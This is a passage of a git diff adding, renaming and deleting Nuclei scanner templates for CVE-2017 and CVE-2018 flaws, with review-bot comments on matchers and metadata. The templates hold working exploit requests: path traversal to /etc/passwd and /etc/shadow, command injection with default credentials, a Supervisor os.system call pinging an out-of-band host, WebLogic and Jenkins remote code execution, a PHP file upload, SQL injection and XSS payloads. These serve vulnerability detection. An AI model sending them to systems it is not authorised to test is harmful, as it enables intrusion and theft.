matchers: - - type: word - words: - - "6dd70f16549456495373a337e6708865" - part: body - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/05/12 diff --git a/nuclei-templates/CVE-2017/cve-2017-1000028.yaml b/nuclei-templates/CVE-2017/cve-2017-1000028.yaml new file mode 100644 index 0000000000..c91556d3c0 --- /dev/null +++ b/nuclei-templates/CVE-2017/cve-2017-1000028.yaml @@ -0,0 +1,41 @@ +id: CVE-2017-1000028 + +info: + name: GlassFish LFI + author: pikpikcu,daffainfo + severity: high + description: Oracle, GlassFish Server Open Source Edition 4.1 is vulnerable to both authenticated and unauthenticated Directory Traversal vulnerability, that can be exploited by issuing a specially crafted HTTP GET request. + reference: + - https://www.exploit-db.com/exploits/45196 + - https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=18822 + - https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904 + - https://www.exploit-db.com/exploits/45196/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2017-1000028 + cwe-id: CWE-22 + tags: cve,cve2017,oracle,glassfish,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd" + - "{{BaseURL}}/theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini" + + stop-at-first-match: true + matchers-condition: or + matchers: + - type: dsl + dsl: + - "regex('root:.*:0:0:', body)" + - "status_code == 200" + condition: and + + - type: dsl + dsl: + - "contains(body, 'bit app support')" + - "contains(body, 'fonts')" + - "contains(body, 'extensions')" + - "status_code == 200" + condition: and 
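Review bot: The added path `nuclei-templates/CVE-2017/cve-2017-1000028.yaml` differs only in letter case from `CVE-2017-1000028.yaml`, which this same patch deletes. A checkout on a case-insensitive filesystem can therefore end up with either file, and the patch repeats this pattern for many templates. The replacement also carries less metadata than the file it replaces: the name becomes `GlassFish LFI` and the NVD reference is gone, while the two `dsl` matchers are unchanged. I would keep the fuller name and add `- https://nvd.nist.gov/vuln/detail/CVE-2017-1000028` back under `reference`.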
diff --git a/nuclei-templates/CVE-2017/cve-2017-10271.yaml b/nuclei-templates/CVE-2017/cve-2017-10271.yaml new file mode 100644 index 0000000000..0417e66eeb --- /dev/null +++ b/nuclei-templates/CVE-2017/cve-2017-10271.yaml @@ -0,0 +1,96 @@ +id: CVE-2017-10271 + +info: + name: Oracle WebLogic Server - Remote Command Execution + author: dr_set,ImNightmaree + severity: high + description: | + Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent - WLS Security). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. + reference: + - https://github.com/vulhub/vulhub/tree/fda47b97c7d2809660a4471539cd0e6dbf8fac8c/weblogic/CVE-2017-10271 + - https://github.com/SuperHacker-liuan/cve-2017-10271-poc + - http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html + - http://www.securitytracker.com/id/1039608 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H + cvss-score: 7.5 + cve-id: CVE-2017-10271 + tags: cve,cve2017,rce,oracle,weblogic,oast + +requests: + - raw: + - | + POST /wls-wsat/CoordinatorPortType HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Accept-Language: en + Content-Type: text/xml + + + + + + + + + + /bin/bash + + + -c + + + example.com + + + + + + + + + + - | + POST /wls-wsat/CoordinatorPortType HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Accept-Language: en + Content-Type: text/xml + + + + + + + + + + + + + {{randstr}} + + + + + + + + + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: regex + regex: + - ".*" + - "{{randstr}}" + condition: or + + - type: status + status: + - 500 + - 200 + condition: or \ No newline at end of file 
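Review bot: The `tags` line still lists `oast`, but this version of the template has no interactsh matcher, so nothing confirms the result out of band any more. The match is now a single `and` of a regex (`".*"` as rendered here, which matches any body, or `{{randstr}}`) with status 500 or 200, which is far looser than the per-request `dsl` matchers of the removed `CVE-2017-10271.yaml`. As written, an error page from an unrelated service at that path can satisfy it. Either drop `oast` from the tags and document the template as a heuristic, or restore the paired conditions from the removed file, `contains(interactsh_protocol, "dns")` with `status_code == 500` and `body == "{{randstr}}"` with `status_code == 200`. The file also ends without a trailing newline.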
diff --git a/nuclei-templates/CVE-2017/cve-2017-11610.yaml b/nuclei-templates/CVE-2017/cve-2017-11610.yaml new file mode 100644 index 0000000000..c0cead3284 --- /dev/null +++ b/nuclei-templates/CVE-2017/cve-2017-11610.yaml @@ -0,0 +1,56 @@ +id: CVE-2017-11610 + +info: + name: Supervisor XMLRPC Exec + author: notnotnotveg + severity: high + description: The XML-RPC server in supervisor before 3.0.1, 3.1.x before 3.1.4, 3.2.x before 3.2.4, and 3.3.x before 3.3.3 allows remote authenticated users to execute arbitrary commands via a crafted XML-RPC request, related to nested supervisord namespace lookups. + reference: + - https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/linux/http/supervisor_xmlrpc_exec.md + - https://nvd.nist.gov/vuln/detail/CVE-2017-11610 + - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXGWOJNSWWK2TTWQJZJUP66FLFIWDMBQ/ + - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DTPDZV4ZRICDYAYZVUHSYZAYDLRMG2IM/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2017-11610 + cwe-id: CWE-276 + metadata: + shodan-query: http.title:"Supervisor Status" + tags: cve,cve2017,rce,supervisor,oast,xmlrpc + +requests: + - raw: + - | + POST /RPC2 HTTP/1.1 + Host: {{Hostname}} + Accept: text/xml + Content-type: text/xml + + + supervisor.supervisord.options.warnings.linecache.os.system + + + nslookup {{interactsh-url}} + + + + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + words: + - "dns" + + - type: word + part: header + words: + - "text/xml" + + - type: word + part: body + words: + - "" + - "" + condition: and diff --git a/nuclei-templates/CVE-2017/cve-2017-12794.yaml b/nuclei-templates/CVE-2017/cve-2017-12794.yaml new file mode 100644 index 0000000000..02b2f66ae2 --- /dev/null +++ b/nuclei-templates/CVE-2017/cve-2017-12794.yaml 
@@ -0,0 +1,42 @@ +id: CVE-2017-12794 + +info: + name: Django Debug Page - Cross-Site Scripting + author: pikpikcu + severity: medium + description: | + Django 1.10.x before 1.10.8 and 1.11.x before 1.11.5 has HTML autoescaping disabled in a portion of the template for the technical 500 debug page. Given the right circumstances, this allows a cross-site scripting attack. This vulnerability shouldn't affect most production sites since run with "DEBUG = True" is not on by default (which is what makes the page visible). + reference: + - https://twitter.com/sec715/status/1406779605055270914 + - https://nvd.nist.gov/vuln/detail/CVE-2017-12794 + - https://www.djangoproject.com/weblog/2017/sep/05/security-releases/ + - http://www.securitytracker.com/id/1039264 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2017-12794 + cwe-id: CWE-79 + tags: xss,django,cve,cve2017 + +requests: + - method: GET + path: + - "{{BaseURL}}/create_user/?username=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: status + status: + - 200 + + - type: word + words: + - "text/html" + part: header + +# Enhanced by mp on 2022/04/26 diff --git a/nuclei-templates/CVE-2017/cve-2017-14535.yaml b/nuclei-templates/CVE-2017/cve-2017-14535.yaml new file mode 100644 index 0000000000..b116743885 --- /dev/null +++ b/nuclei-templates/CVE-2017/cve-2017-14535.yaml 
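Review bot: The probe path `/create_user/?username=...` in cve-2017-12794.yaml looks like a route of one sample application rather than something Django itself provides, so a clean result says little about a real site running an affected Django release with `DEBUG = True`. I would add a comment above `requests:` such as `# Probes /create_user/ only; a miss does not show that the debug page is patched.` The body word appears empty on this page, possibly lost in rendering; if it is empty in the file too, the body matcher matches everything and the verdict rests on status and content type alone.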
@@ -0,0 +1,42 @@ +id: CVE-2017-14535 + +info: + name: Trixbox - 2.8.0.4 OS Command Injection + author: pikpikcu + severity: high + description: Trixbox 2.8.0.4 is vulnerable to OS command injection via shell metacharacters in the lang parameter to /maint/modules/home/index.php. + reference: + - https://secur1tyadvisory.wordpress.com/2018/02/11/trixbox-os-command-injection-vulnerability-cve-2017-14535/ + - https://www.exploit-db.com/exploits/49913 + - https://nvd.nist.gov/vuln/detail/CVE-2017-14535 + - https://www.linkedin.com/pulse/trixbox-os-command-injection-vulnerability-sachin-wagh-ceh-ecsa-/?published=t + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2017-14535 + cwe-id: CWE-78 + tags: cve,cve2017,trixbox,rce,injection + +requests: + - raw: + - | + GET /maint/modules/home/index.php?lang=english|cat%20/etc/passwd HTTP/1.1 + Host: {{Hostname}} + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 + Accept-Language: de,en-US;q=0.7,en;q=0.3 + Authorization: Basic bWFpbnQ6cGFzc3dvcmQ= + Connection: close + Cache-Control: max-age=0 + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/04/01 diff --git a/nuclei-templates/CVE-2017/cve-2017-15287.yaml b/nuclei-templates/CVE-2017/cve-2017-15287.yaml new file mode 100644 index 0000000000..144181dec3 --- /dev/null +++ b/nuclei-templates/CVE-2017/cve-2017-15287.yaml 
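Review bot: The request in cve-2017-14535.yaml carries `Authorization: Basic bWFpbnQ6cGFzc3dvcmQ=`, which decodes to `maint:password`, yet neither the name nor the description says the check depends on that default login. A host whose maint password was changed will come back clean while still running Trixbox 2.8.0.4, so a result means "default credentials plus injection", not a version check. I would say so in the description and add a comment next to the header, e.g. `# default maint/password login; hosts with changed credentials are not tested`.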
@@ -0,0 +1,32 @@ +id: CVE-2017-15287 + +info: + name: Dreambox WebControl 2.0.0 - Cross-Site Scripting + author: pikpikcu + severity: medium + description: | + Dream Multimedia Dreambox devices via their WebControl component are vulnerable to reflected cross-site scripting, as demonstrated by the "Name des Bouquets" field, or the file parameter to the /file URI. + reference: + - https://fireshellsecurity.team/assets/pdf/Vulnerability-XSS-Dreambox.pdf + - https://www.exploit-db.com/exploits/42986/ + - https://nvd.nist.gov/vuln/detail/CVE-2017-15287 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2017-15287 + cwe-id: CWE-79 + tags: cve,cve2017,xss,dreambox + +requests: + - raw: + - | + GET /webadmin/pkg?command= HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + matchers: + - type: word + words: + - 'Unknown command: ' + +# Enhanced by mp on 2022/04/26 diff --git a/nuclei-templates/CVE-2017/cve-2017-15647.yaml b/nuclei-templates/CVE-2017/cve-2017-15647.yaml new file mode 100644 index 0000000000..eb06edfa05 --- /dev/null +++ b/nuclei-templates/CVE-2017/cve-2017-15647.yaml 
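Review bot: cve-2017-15287.yaml decides on a single body word, `'Unknown command: '`, with no content-type check, whereas the other XSS templates in this patch (cve-2017-12794, cve-2017-17451) also require `text/html` in the response header. As shown, any device that echoes an error for an unknown command would be flagged whether or not the reply is rendered as HTML. I would add `matchers-condition: and` and a header word matcher, as sketched below. The `command=` value appears empty on this page, so the reflected marker may have been lost in rendering; the body word should include it.

```yaml
    matchers-condition: and
    matchers:
      # … unchanged: body word matcher for 'Unknown command: ' …
      - type: word
        part: header
        words:
          - "text/html"
```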
@@ -0,0 +1,33 @@ +id: CVE-2017-15647 + +info: + name: FiberHome - Directory Traversal + author: daffainfo + severity: high + description: On FiberHome routers, Directory Traversal exists in /cgi-bin/webproc via the getpage parameter in conjunction with a crafted var:page value. + reference: + - https://www.exploit-db.com/exploits/44054 + - https://www.cvedetails.com/cve/CVE-2017-15647 + - https://blogs.securiteam.com/index.php/archives/3472 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2017-15647 + cwe-id: CWE-22 + tags: cve,cve2017,lfi,router + +requests: + - method: GET + path: + - "{{BaseURL}}/cgi-bin/webproc?getpage=/etc/passwd&var:language=en_us&var:page=wizardfifth" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2017/cve-2017-17451.yaml b/nuclei-templates/CVE-2017/cve-2017-17451.yaml new file mode 100644 index 0000000000..69e1e0c84d --- /dev/null +++ b/nuclei-templates/CVE-2017/cve-2017-17451.yaml 
@@ -0,0 +1,39 @@ +id: CVE-2017-17451 + +info: + name: WP Mailster <= 1.5.4 - Unauthenticated Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: The WP Mailster plugin before 1.5.5 for WordPress has XSS in the unsubscribe handler via the mes parameter to view/subscription/unsubscribe2.php. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2017-17451 + - https://wordpress.org/plugins/wp-mailster/#developers + - https://packetstormsecurity.com/files/145222/WordPress-WP-Mailster-1.5.4.0-Cross-Site-Scripting.html + - https://wpvulndb.com/vulnerabilities/8973 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2017-17451 + cwe-id: CWE-79 + tags: cve,cve2017,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/wp-mailster/view/subscription/unsubscribe2.php?mes=%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2017/CVE-2017-18536.yaml b/nuclei-templates/CVE-2017/cve-2017-18536.yaml similarity index 100% rename from nuclei-templates/CVE-2017/CVE-2017-18536.yaml rename to nuclei-templates/CVE-2017/cve-2017-18536.yaml diff --git a/nuclei-templates/CVE-2017/cve-2017-4011.yaml b/nuclei-templates/CVE-2017/cve-2017-4011.yaml new file mode 100644 index 0000000000..77cda0cb40 --- /dev/null +++ b/nuclei-templates/CVE-2017/cve-2017-4011.yaml 
@@ -0,0 +1,36 @@ +id: CVE-2017-4011 + +info: + name: McAfee NDLP User-Agent XSS + author: geeknik + severity: medium + description: McAfee Network Data Loss Prevention (NDLP) 9.3.x allows remote attackers to get session/cookie information via modification of the HTTP request. + reference: + - https://medium.com/@david.valles/cve-2017-4011-reflected-xss-found-in-mcafee-network-data-loss-prevention-ndlp-9-3-x-cf20451870ab + - https://kc.mcafee.com/corporate/index?page=content&id=SB10198 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-4011 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2017-4011 + cwe-id: CWE-79 + tags: cve,cve2017,mcafee,xss + +requests: + - method: GET + path: + - "{{BaseURL}}" + headers: + User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1';alert(/XSS/);// + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "var ua='Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1';alert(/XSS/);//" + + - type: word + part: header + words: + - "text/html" diff --git a/nuclei-templates/CVE-2017/CVE-2017-5487.yaml b/nuclei-templates/CVE-2017/cve-2017-5487.yaml similarity index 100% rename from nuclei-templates/CVE-2017/CVE-2017-5487.yaml rename to nuclei-templates/CVE-2017/cve-2017-5487.yaml diff --git a/nuclei-templates/CVE-2017/cve-2017-6090.yaml b/nuclei-templates/CVE-2017/cve-2017-6090.yaml new file mode 100644 index 0000000000..0a448dae64 --- /dev/null +++ b/nuclei-templates/CVE-2017/cve-2017-6090.yaml 
@@ -0,0 +1,49 @@ +id: CVE-2017-6090 + +info: + name: PhpColl 2.5.1 Arbitrary File Upload + author: pikpikcu + severity: high + description: PhpCollab 2.5.1 and earlier allows remote authenticated users to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in logos_clients/ via clients/editclient.php. + reference: + - https://sysdream.com/news/lab/2017-09-29-cve-2017-6090-phpcollab-2-5-1-arbitrary-file-upload-unauthenticated/ + - https://nvd.nist.gov/vuln/detail/CVE-2017-6090 + - https://www.exploit-db.com/exploits/42934/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2017-6090 + cwe-id: CWE-434 + tags: cve,cve2017,phpcollab,rce,fileupload + +requests: + - raw: + - | # REQUEST 1 + POST /clients/editclient.php?id={{randstr}}&action=update HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=---------------------------154934846911423734231554128137 + + -----------------------------154934846911423734231554128137 + Content-Disposition: form-data; name="upload"; filename="{{randstr}}.php" + Content-Type: application/x-php + + + + -----------------------------154934846911423734231554128137-- + + - | # REQUEST 2 + GET /logos_clients/1.php HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "48dbd2384cb6b996fa1e2855c7f0567f" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/04/06 diff --git a/nuclei-templates/CVE-2017/cve-2017-7615.yaml b/nuclei-templates/CVE-2017/cve-2017-7615.yaml new file mode 100644 index 0000000000..2c4e7785e0 --- /dev/null +++ b/nuclei-templates/CVE-2017/cve-2017-7615.yaml 
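Review bot: cve-2017-6090.yaml writes a `.php` file into the target's `logos_clients/` directory and never removes it, but nothing in `tags` marks the template as intrusive. I would use `tags: cve,cve2017,phpcollab,rce,fileupload,intrusive` so it can be excluded from scans of production systems. The first request uses `{{randstr}}` for both `id` and the filename while the second fetches the fixed `/logos_clients/1.php`, so the two may not refer to the same file; please confirm on a test instance, since a mismatch would mean silent false negatives. The upload body appears empty on this page, so I cannot check that it produces the `48dbd2384cb6b996fa1e2855c7f0567f` marker.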
@@ -0,0 +1,44 @@ +id: CVE-2017-7615 + +# THIS TEMPLATE IS ONLY FOR DETECTING +# To carry out further attacks, please see reference[2] below. +# This template works by guessing user ID. +# MantisBT before 1.3.10, 2.2.4, and 2.3.1, that can be downloaded on reference[1]. + +info: + name: MantisBT <=2.30 - Arbitrary Password Reset and Unauthenticated Admin Access + author: bp0lr,dwisiswant0 + severity: high + description: MantisBT through 2.3.0 allows arbitrary password reset and unauthenticated admin access via an empty confirm_hash value to verify.php. + reference: + - https://sourceforge.net/projects/mantisbt/files/mantis-stable/ + - http://hyp3rlinx.altervista.org/advisories/MANTIS-BUG-TRACKER-PRE-AUTH-REMOTE-PASSWORD-RESET.txt + - https://www.exploit-db.com/exploits/41890 + - http://www.openwall.com/lists/oss-security/2017/04/16/2 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2017-7615 + cwe-id: CWE-640 + tags: cve,cve2017,mantisbt + +requests: + - method: GET + path: + - "{{BaseURL}}/verify.php?id=1&confirm_hash=" + - "{{BaseURL}}/mantis/verify.php?id=1&confirm_hash=" + - "{{BaseURL}}/mantisBT/verify.php?id=1&confirm_hash=" + - "{{BaseURL}}/mantisbt-2.3.0/verify.php?id=1&confirm_hash=" + - "{{BaseURL}}/bugs/verify.php?confirm_hash=&id=1" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + words: + - " + + - | + GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: text/html + + + + - | + GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: text/html + + + + - | + GET /laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: text/html + + + + - | + GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: text/html + + + + - | + GET 
/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: text/html + + + + matchers-condition: and + matchers: + - type: word + words: + - "6dd70f16549456495373a337e6708865" + part: body + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/05/12 diff --git a/nuclei-templates/CVE-2018/CVE-2018-1000856.yaml b/nuclei-templates/CVE-2018/CVE-2018-1000856.yaml deleted file mode 100644 index 836d88b898..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-1000856.yaml +++ /dev/null @@ -1,52 +0,0 @@ -id: CVE-2018-1000856 -info: - name: DomainMOD 4.11.01 - Cross-Site Scripting - author: arafatansari - severity: medium - description: | - DomainMOD 4.11.01 is vulnerable to Cross Site Scripting (XSS) via segments/add.php Segment Name field. - reference: - - https://github.com/domainmod/domainmod/issues/80 - - https://nvd.nist.gov/vuln/detail/CVE-2018-1000856 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N - cvss-score: 4.8 - cve-id: CVE-2018-1000856 - cwe-id: CWE-79 - metadata: - verified: "true" - tags: cve,cve2018,domainmod,xss,authenticated -requests: - - raw: - - | - POST / HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - new_username={{username}}&new_password={{password}} - - | - POST /segments/add.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - new_name=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&raw_domain_list=test.com&new_description=test&new_notes=test - - | - GET /segments/ HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - cookie-reuse: true - redirects: true - max-redirects: 3 - matchers-condition: and - matchers: - - type: word - part: body - words: - - "" - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 
diff --git a/nuclei-templates/CVE-2018/CVE-2018-1000861.yaml b/nuclei-templates/CVE-2018/CVE-2018-1000861.yaml deleted file mode 100644 index d19af14c58..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-1000861.yaml +++ /dev/null @@ -1,37 +0,0 @@ -id: CVE-2018-1000861 - -info: - name: Jenkins - Remote Command Injection - author: dhiyaneshDK,pikpikcu - severity: critical - description: Jenkins 2.153 and earlier and LTS 2.138.3 and earlier are susceptible to a remote command injection via stapler/core/src/main/java/org/kohsuke/stapler/MetaClass.java that allows attackers to invoke some methods on Java objects by accessing crafted URLs that were not intended to be invoked this way. - reference: - - https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2018-1000861 - - https://nvd.nist.gov/vuln/detail/CVE-2018-1000861 - - https://jenkins.io/security/advisory/2018-12-05/#SECURITY-595 - - http://web.archive.org/web/20210421212616/https://www.securityfocus.com/bid/106176 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2018-1000861 - cwe-id: CWE-502 - tags: kev,vulhub,cve,cve2018,rce,jenkins - -requests: - - method: GET - path: - - '{{BaseURL}}/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%0aimport%20Payload;' - - matchers-condition: and - matchers: - - - type: word - words: - - "package#vulntest" - part: body - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/05/12 diff --git a/nuclei-templates/CVE-2018/cve-2018-10201.yaml b/nuclei-templates/CVE-2018/CVE-2018-10201.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-10201.yaml rename to nuclei-templates/CVE-2018/CVE-2018-10201.yaml 
diff --git a/nuclei-templates/CVE-2018/CVE-2018-10230.yaml b/nuclei-templates/CVE-2018/CVE-2018-10230.yaml new file mode 100644 index 0000000000..281d1a1d81 --- /dev/null +++ b/nuclei-templates/CVE-2018/CVE-2018-10230.yaml @@ -0,0 +1,36 @@ +id: CVE-2018-10230 +info: + name: Zend Server < 9.13 - XSS + author: marcos_iaf + severity: medium + description: | + A vulnerability in ZendServer < 9.13 allows an attacker to perform Reflected XSS via the debug_host parameter. + reference: + - https://www.synacktiv.com/ressources/zend_server_9_1_3_xss.pdf + - https://nvd.nist.gov/vuln/detail/CVE-2018-10230 + - https://www.zend.com/en/products/server/release-notes + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2018-10230 + cwe-id: CWE-79 + tags: cve,cve2018,xss,zend +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?debug_host=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&start_debug=1" + matchers-condition: and + matchers: + - type: word + part: body + words: + - "" + - "is not allowed to open debug sessions" + condition: and + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2018/cve-2018-10818.yaml b/nuclei-templates/CVE-2018/CVE-2018-10818.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-10818.yaml rename to nuclei-templates/CVE-2018/CVE-2018-10818.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-10823.yaml b/nuclei-templates/CVE-2018/CVE-2018-10823.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-10823.yaml rename to nuclei-templates/CVE-2018/CVE-2018-10823.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-10956.yaml b/nuclei-templates/CVE-2018/CVE-2018-10956.yaml deleted file mode 100644 index 89b1bbae56..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-10956.yaml +++ /dev/null 
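Review bot: The `name` and `description` in CVE-2018-10230.yaml give the fixed version as `9.13`, while the first reference is titled `zend_server_9_1_3_xss.pdf`, which suggests 9.1.3. If the advisory is right, change them to `name: Zend Server < 9.1.3 - XSS` and `ZendServer < 9.1.3` in the description, so that whoever triages a finding compares against the correct release.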
@@ -1,32 +0,0 @@ - -id: CVE-2018-10956 -info: - name: IPConfigure Orchid Core VMS 2.0.5 - Unauthenticated Directory Traversal. - author: 0x_Akoko - severity: high - description: IPConfigure Orchid Core VMS 2.0.5 allows Directory Traversal. - reference: - - https://labs.nettitude.com/blog/cve-2018-10956-unauthenticated-privileged-directory-traversal-in-ipconfigure-orchid-core-vms/ - - https://www.cvedetails.com/cve/CVE-2018-10956 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H - cvss-score: 7.5 - cve-id: CVE-2018-10956 - cwe-id: CWE-22 - tags: cve,cve2018,Orchid,vms,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/etc/shadow" - matchers-condition: and - matchers: - - type: word - words: - - "root:*:" - - "bin:*:" - condition: and - part: body - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2018/CVE-2018-11231.yaml b/nuclei-templates/CVE-2018/CVE-2018-11231.yaml new file mode 100644 index 0000000000..9412a5f837 --- /dev/null +++ b/nuclei-templates/CVE-2018/CVE-2018-11231.yaml 
@@ -0,0 +1,38 @@ +id: CVE-2018-11231 +info: + name: Opencart Divido - Sql Injection + author: ritikchaddha + severity: high + description: | + OpenCart Divido plugin is susceptible to SQL injection + reference: + - http://foreversong.cn/archives/1183 + - https://nvd.nist.gov/vuln/detail/CVE-2018-11231 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.10 + cve-id: CVE-2018-11231 + cwe-id: CWE-89 + tags: cve,cve2018,opencart,sqli +variables: + num: "999999999" +requests: + - raw: + - | + POST /upload/index.php?route=extension/payment/divido/update HTTP/1.1 + Host: {{Hostname}} + + {"metadata":{"order_id":"1 and updatexml(1,concat(0x7e,(SELECT md5({{num}})),0x7e),1)"},"status":2} + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + part: body + words: + - '{{md5({{num}})}}' + - type: status + status: + - 200 + +# Enhanced by mp on 2022/06/19 diff --git a/nuclei-templates/CVE-2018/cve-2018-11510.yaml b/nuclei-templates/CVE-2018/CVE-2018-11510.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-11510.yaml rename to nuclei-templates/CVE-2018/CVE-2018-11510.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-11709.yaml 